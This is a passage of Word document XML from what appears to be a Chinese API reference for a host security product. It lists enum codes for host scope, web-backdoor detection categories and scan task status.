          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="329CB1F4" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>0</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4063B8AE" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>否</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="2B695461" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="32C109B3" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>abnormalTime</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="329DEC3F" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6F7D0D04" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>是</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="02D6E5E2" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:bookmarkStart w:id="305" w:name="主机范围"/>
      <w:bookmarkEnd w:id="304"/>
      <w:r>
        <w:t>主机范围</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="0020" w:firstRow="1" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:noHBand="0" w:noVBand="0"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="1199"/>
        <w:gridCol w:w="1044"/>
        <w:gridCol w:w="1004"/>
      </w:tblGrid>
      <w:tr w:rsidR="00497C54" w14:paraId="4EA4A872"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93DBE03" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>字段</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="20AF2155" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>字段内容</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="799E72BD" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="15ACA261" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1DDEEF50" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>realmKind</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0C8F97FF" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>0</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7BC6D37F" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>全部主机</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="17228B4C" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1ADE24CE" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>realmKind</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5736A3D7" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="66384100" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>主机</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="612D80F6" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2346A479" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>realmKind</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="682082D5" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="42480D28" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>业务组</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="29B93782" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:bookmarkStart w:id="306" w:name="web后门类型"/>
      <w:bookmarkEnd w:id="305"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>web后门类型</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="0020" w:firstRow="1" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:noHBand="0" w:noVBand="0"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="632"/>
        <w:gridCol w:w="1044"/>
        <w:gridCol w:w="1397"/>
      </w:tblGrid>
      <w:tr w:rsidR="00497C54" w14:paraId="49641171"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1933D69" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>字段</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="48A7AE0D" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>字段内容</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="63CCF872" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="6FFBCBF2" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1EFE08B3" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>type</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="12A07D0B" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="31E9C372" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>代码执行</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="2E921497" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="29CBF375" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>type</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1047A2C1" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="273B7206" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>系统执行</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="4800043F" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="352CB87A" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>type</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0FADEF13" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1EB95BB5" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>数据库后门</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="0A5FAF65" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="43AFC864" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>type</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="49A7868F" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>4</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3AE1FACF" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>文件目录管理</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="1D1C5BE5" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="13D86127" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>type</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6F13D621" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>5</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="670A9C55" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>特性后门</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="69597AE6" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="63FE330F" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>type</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="29F9C29B" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>6</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6DAB8D52" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>多功能木马</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="0C4DE66B" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="28CCA9FD" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>type</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4EA21FFB" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>7</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3CB1CE8E" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>已知后门</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="060930EE" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="238D5FA1" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>type</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="019A6548" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>8</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1B2C1AB4" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>云引擎检测</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="4B9EAB1B" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="29A6C8A8" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>type</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7E6C9AF9" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>9</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="27824505" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>Avira引擎</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="444C4611" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2116FFEE" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>type</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0A650E21" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>10</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="61DBB219" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>雷火引擎</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="1B673ADF" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3D28E3FA" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>type</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="64BEB394" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>11</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="02FC12BB" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>已知恶意样本</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="5032AACA" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="624A338F" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>type</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="53A8EEC8" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>301</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="12DD55D6" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>远程下载</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="31E1DBED" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="42CEDC20" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>type</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="14DFA22D" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>401</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="625D5710" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>混淆加密</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="40BEE824" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:bookmarkStart w:id="307" w:name="扫描状态"/>
      <w:bookmarkEnd w:id="306"/>
      <w:r>
        <w:t>扫描状态</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="0020" w:firstRow="1" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:noHBand="0" w:noVBand="0"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="941"/>
        <w:gridCol w:w="1044"/>
        <w:gridCol w:w="1201"/>
      </w:tblGrid>
      <w:tr w:rsidR="00497C54" w14:paraId="3B5556E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6DC8D22" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>字段</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="061F4C50" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>字段内容</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="79BF4F62" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="5EA51735" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="53F33F12" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>retcode</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="35C77200" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>-1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3F6D4962" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>无任务</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="740CBDDD" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7E782797" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>retcode</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6293B5CD" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>0</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="57B273AE" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>未开始执行</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="0DD9278B" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="27DCB774" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>retcode</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5976B3D5" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="39DDD24A" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>排队执行</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="40165045" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5ECEBDFC" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>retcode</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3C5B591E" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1776B54F" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>正在执行</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
